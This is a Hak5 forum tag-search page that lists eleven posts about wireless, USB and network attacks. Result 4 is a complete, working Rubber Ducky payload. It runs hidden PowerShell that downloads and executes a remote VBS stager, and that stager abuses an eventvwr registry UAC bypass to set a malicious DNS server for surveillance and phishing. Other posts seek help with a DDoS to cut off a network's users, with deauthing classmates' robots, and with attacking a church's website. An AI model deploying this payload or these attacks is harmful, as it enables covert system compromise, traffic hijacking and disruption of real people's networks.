Jump to content

Search the Community

Showing results for tags 'attack'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 11 results

  1. Hi, I am trying to do a replay attack on a remote control that I have. I can capture the signals fine but when I go to decode it the wave form looks very strange and very difficult to decode. The remote sends the same string 10 times. Maybe I'm missing something? I don't know. I would love some help from anyone and your answer would be greatly valued 🙂 Please see the following pictures Zoomed in The whole string zoomed out
  2. Hello people, I was recently doing some work with those VEX Robotics wireless control robots and I had some ideas about packet sniffing attacks, replay attacks, man in the middle attacks, and de-authentication attacks. The robots use the Vex cortex, which has a wireless adapter through a USB port, it says that is is 2.4 GHz, and another USB wireless adapter is plunged into a controller, like a joystick. My school did a competition with these robots, and it ended last week, now we are doing another thing just as a school, they said we were doing battle bots. When I did some research I hadn't seen anybody do anything like this and I though I would look into it. When I was doing research I found that, the robots don't use any encryption it is end to end, the controllers or create there own network an access point that the robot connects to, the network it creates is hidden it does not broadcast its SSID and has to be pared with the cortex, they are 2.4 GHz, they all have independent channels or mac addresses (many can operate at the same time without interference). The first thing I though of would be a deauth attack, where I would send out deauth frames to disconnect their robot from the controller from the cortex leaving their robot powerless, I was tinging I could do this with Aircrack-ng, put my wireless card into monitor mode with airmon-ng, find the mac address and channel of the robot with airodump-ng, deauth with aireplay-ng. The next attack I though of was if I could intercept packets from the remote to the cortex and either replay them to keep doing an operation or send in my own by finding out what commands correlated to what packets and injecting them while impersonating the robot. I have not done much with packet sniffing/replay/injection if anybody knows anything on how I could do that? or if anybody has done anything with these robots? or if you have any ideas on wireless attacks? I am all ears and I would love help and suggestions, this seems like a really cool project. I would love to hear your thoughts, thank you
  3. I plan to connect a battery to my bash bunny when I receive it. Hoping that this will keep the bash bunny running before plugging the device into a target to speed up attacks. Any reason why this wouldn't work?
  4. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  5. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  6. Hello everyone, I am Cr0wTom and I recently posted in my channel a video about how to implement rubber ducky scripts in a vulnerable to BadUSB, USB thumb drive. I think that you will appreciate it here. I will be happy to hear your responce, here or in my videos commends. Feel free to subscribe :) Video Link: Thank you for watching!! (More videos to come)
  7. Guest

    DDOS Help

    There is a networking am wanting to attack just to interrupt connection. They have a MAC Filter enable and my regular ddos attack does not go through. Is there any other method of attack that will interrupt connection to their users? Need of Help ASAP
  8. Hey guys! I present you, Automator!, A module that automates attacks such as Deauthing and Karma, and more on the way! It asks you for a few options on each attacks then commences the attack. Features : -Automated attacks -Install packages that are needed -Add and Edit profiles for attacks -Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack! Coming soon : -Edit back-end scripts to suit your needs -Add community attacks/automations to the module -Auto-detect wifi cards -Reaver Automation Sneak peak :
  9. Hello, I recently acquired the Mark IV and it's a nice little box, but as one might expect not super power. Running items like sslstrip, mitm etc at the same time forces a watchdog reboot. However I don't actually need that on the Pineapple. My idea for the travel kit: - Could be used for full MiTM attacks - Could be used for WPA2-Enterprise credential capture Solution idea: connect a 3G modem (Huawei E220) in my case Configure a script to choose between WAN or 3G for connectivity (via cron, check 3g and wan. Choose wan over 3g, establish default route) Start openvpn to home network for: Radius connectivity Force all traffic over home network for MiTM & tcpdump With the exception of getting the E220 to work reliable I think I can manage most / all on a regular linux box. But if one has tips for Pineapple WiFi. As some of the questions are: - How to configure secondary SSID's (via uci or otherwise) - Any pointers / tips in general on the E220 (saw one topic, but it doesn't work - hard to find logs/debug info - for instance where is ppp log?) Thx, stijn
  10. Hello there, i am interested in ettercap. I want to know, if there is possible way to have ettercap on one laptop and be on it both, as a victim an attacker. for example, i start ettercap with filter setting instead of acceptencoding to acceptrubbish and as parameter i set my ip address, so i can edit my packets? i can't make it work fro some unknown reasons. thanks for reply
  11. Hey guys! Just a curious question, would you consider hacking or DDOS'ing the Westboro Baptist Church's website, black hat hacking or white hat hacking? If you are not familiar, the Westboro Baptist Church is an EXTREMELY hateful little group in Topeka, Kansas. The group primarily attacks gays, and pretty much justifies everything they do through blaming gay people and America. They have protested hundreds of funerals of fallen soldiers and recently posted that they planed to attend the funerals of those who's lives were taken at the Sandy Hook tragedy (not sure if they actually went or not). I do know that "Anonymous", very recently, attacked their websites and twitter, posting the names, home adresses and phone numbers of those A**holes. What are your opinons on this? If you think its White hat hacking, what would your attack method be?
×
×
  • Create New...